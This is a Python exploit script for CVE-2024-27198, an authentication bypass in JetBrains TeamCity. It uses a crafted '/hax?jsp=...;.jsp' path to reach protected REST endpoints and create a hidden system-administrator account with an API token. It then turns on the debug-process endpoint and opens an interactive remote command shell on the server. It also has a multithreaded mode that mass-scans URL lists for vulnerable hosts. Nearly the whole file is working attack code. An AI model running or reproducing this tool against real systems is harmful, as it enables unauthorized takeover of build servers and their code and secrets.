import random import string import urllib3 import argparse import requests import xml.etree.ElementTree as ET from rich.console import Console from urllib.parse import quote_plus from alive_progress import alive_bar from prompt_toolkit import PromptSession, HTML from prompt_toolkit.history import InMemoryHistory from concurrent.futures import ThreadPoolExecutor, as_completed urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class TeamCity: def __init__(self, url, os="windows", verbose=False): self.url = url self.os = os self.verbose = verbose self.console = Console() def custom_print(self, message: str, header: str) -> None: header_colors = {"+": "green", "-": "red", "!": "yellow", "*": "blue"} self.console.print( f"[bold {header_colors.get(header, 'white')}][{header}][/bold {header_colors.get(header, 'white')}] {message}" ) @staticmethod def generate_random_credentials(): username = "".join(random.choices(string.ascii_lowercase + string.digits, k=8)) password = "".join(random.choices(string.ascii_letters + string.digits, k=10)) return username, password def add_user(self): username, password = self.generate_random_credentials() user_data = { "username": username, "password": password, "email": f"{username}@example.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}, } headers = {"Content-Type": "application/json"} add_user_url = f"{self.url}/hax?jsp=/app/rest/users;.jsp" try: response = requests.post( add_user_url, json=user_data, headers=headers, verify=False ) if response.status_code == 200: user_info = self.parse_user_response(response.text) if user_info: self.custom_print( f"User created successfully. Username: {user_info['username']}, ID: {user_info['id']}, Password: {password}", "+", ) token_info = self.generate_user_token(user_info["id"]) if token_info: modify_property = self.modify_internal_properties( token_info["value"], "rest.debug.processes.enable", "true" ) self.interactive_shell( token_info["value"] ) if modify_property else None else: self.custom_print("User created but failed to parse response.", "!") else: self.custom_print( f"Failed to create user. Status Code: {response.status_code}", "-" ) except requests.exceptions.RequestException as e: self.custom_print(f"Request failed: {e}", "-") if self.verbose else None def generate_user_token(self, user_id): token_name = "".join(random.choices(string.ascii_letters + string.digits, k=10)) token_url = ( f"{self.url}/hax?jsp=/app/rest/users/id:{user_id}/tokens/{token_name};.jsp" ) try: response = requests.post(token_url, verify=False) if response.status_code == 200: token_info = self.parse_token_response(response.text) if token_info: self.custom_print( f"Token created successfully for user ID: {user_id}. Token Name: {token_name}, Token: {token_info['value']}", "+", ) return token_info else: self.custom_print( "Token created but failed to parse response.", "!" ) else: self.custom_print( f"Failed to create token. Status Code: {response.status_code}", "-" ) except requests.exceptions.RequestException as e: self.custom_print(f"Request failed: {e}", "-") def parse_user_response(self, response_text): try: root = ET.fromstring(response_text) user_info = { "username": root.attrib.get("username"), "id": root.attrib.get("id"), "email": root.attrib.get("email"), } return user_info except ET.ParseError as e: self.custom_print(f"Failed to parse user XML response: {e}", "!") return None def modify_internal_properties(self, token, key, value): uri = f"{self.url}/admin/dataDir.html" headers = {"Authorization": f"Bearer {token}"} params = { "action": "edit", "fileName": "config/internal.properties", "content": f"{key}={value}" if value else "", } try: response = requests.post(uri, headers=headers, params=params, verify=False) if response.status_code == 200: self.custom_print("Internal properties modified successfully.", "+") return True else: self.custom_print( f"Failed to modify internal properties. Status Code: {response.status_code}", "-", ) return False except requests.exceptions.RequestException as e: self.custom_print(f"Request failed: {e}", "-") return False def execute_remote_command(self, token, os_type="linux", command="whoami"): headers = { "Authorization": f"Bearer {token}", } match os_type.lower(): case "windows": exe_path = "cmd.exe" params = "/c" case "linux": exe_path = "/bin/sh" params = "-c" command_encoded = quote_plus(command) execute_url = f"{self.url}/app/rest/debug/processes?exePath={exe_path}¶ms={params}¶ms={command_encoded}" try: response = requests.post(execute_url, headers=headers, verify=False) if response.status_code == 200: return response.text else: return False except requests.exceptions.RequestException: return False def parse_response(self, response_text, parse_type): try: root = ET.fromstring(response_text) if parse_type == "version": return root.attrib.get("version") except ET.ParseError as e: self.custom_print( f"Failed to parse XML response: {e}", "!" ) if self.verbose else None return None def process_users(self, users_xml): try: root = ET.fromstring(users_xml) users_count = root.attrib.get("count", "0") self.custom_print(f"Total Users: {users_count}", "*") for user in root.findall("user"): username = user.attrib.get("username", "N/A") name = user.attrib.get("name", "N/A") user_id = user.attrib.get("id", "N/A") self.custom_print(f"User: {username}, Name: {name}, ID: {user_id}", "*") except ET.ParseError as e: self.custom_print(f"Failed to parse users XML response: {e}", "!") def parse_token_response(self, response_text): try: root = ET.fromstring(response_text) token_info = { "name": root.attrib.get("name"), "value": root.attrib.get("value"), "creationTime": root.attrib.get("creationTime"), } return token_info except ET.ParseError as e: self.custom_print(f"Failed to parse token XML response: {e}", "!") return None def make_request(self): version_url = f"{self.url}/hax?jsp=/app/rest/server;.jsp" users_url = f"{self.url}/hax?jsp=/app/rest/users;.jsp" try: version_response = requests.get(version_url, verify=False, timeout=20) users_response = requests.get(users_url, verify=False, timeout=20) version = self.parse_response(version_response.text, "version") if version_response.status_code == 200 and version: self.custom_print( f"{self.url:<{30}} | Server Version: {version:<{30}} | CVE-2024-27198", "+", ) if users_response.status_code == 200 and self.verbose: self.process_users(users_response.text) else: self.custom_print( "Failed to retrieve user information.", "!" ) if self.verbose else None return True else: self.custom_print( f"{self.url} is not vulnerable.", "-" ) if self.verbose else None return False except requests.exceptions.RequestException as e: self.custom_print(f"Request failed: {e}", "-") if self.verbose else None def interactive_shell(self, token): test_command_output = self.execute_remote_command( token, self.os, command="echo Ready" ) if test_command_output: self.custom_print("Shell is ready, please type your commands UwU", "!") else: self.custom_print( "Failed to execute test command. Remote command execution may not be available.", "-", ) return session = PromptSession(history=InMemoryHistory()) while True: try: cmd = session.prompt(HTML("$ ")) match cmd.lower(): case "exit": break case "clear": self.console.clear() case _: output = self.execute_remote_command( token, self.os, command=cmd ) if output: self.custom_print(f"Output:\n{output}", "+") else: self.custom_print("Failed to execute command.", "-") except KeyboardInterrupt: self.modify_internal_properties( token, "rest.debug.processes.enable", "false" ) break def scan_url(url, output): team_city = TeamCity(url) if team_city.make_request(): with open(output, "a") as file: file.write(f"{url}\n") def main(): parser = argparse.ArgumentParser( description=""" Exploit script for CVE-2024-27198: Demonstrates an authentication bypass vulnerability in JetBrains TeamCity versions prior to 2023.11.4. This tool can add a user with administrative privileges or list users on vulnerable servers, providing a proof of concept for unauthorized admin actions.""" ) parser.add_argument("-u", "--url", type=str, help="URL to TeamCity server.") parser.add_argument( "--add-user", action="store_true", help="Add a new user with random credentials and parse response.", ) parser.add_argument( "--payload-type", type=str, default="linux", help="Payload type ('linux' or 'windows').", ) parser.add_argument( "-l", "--list", type=str, help="File containing list of URLs to process." ) parser.add_argument( "-o", "--output", type=str, help="Path to the output file where results will be saved.", ) args = parser.parse_args() if args.list: urls = [] with open(args.list, "r") as file: urls = [line.strip() for line in file.readlines()] with alive_bar(len(urls), enrich_print=False) as bar: with ThreadPoolExecutor(max_workers=100) as executor: future_to_url = { executor.submit(scan_url, url, args.output): url for url in urls } for _ in as_completed(future_to_url): bar() elif args.url: team_city = TeamCity(args.url, args.payload_type, verbose=True) if args.add_user: team_city.add_user() else: team_city.make_request() else: parser.print_help() if __name__ == "__main__": main()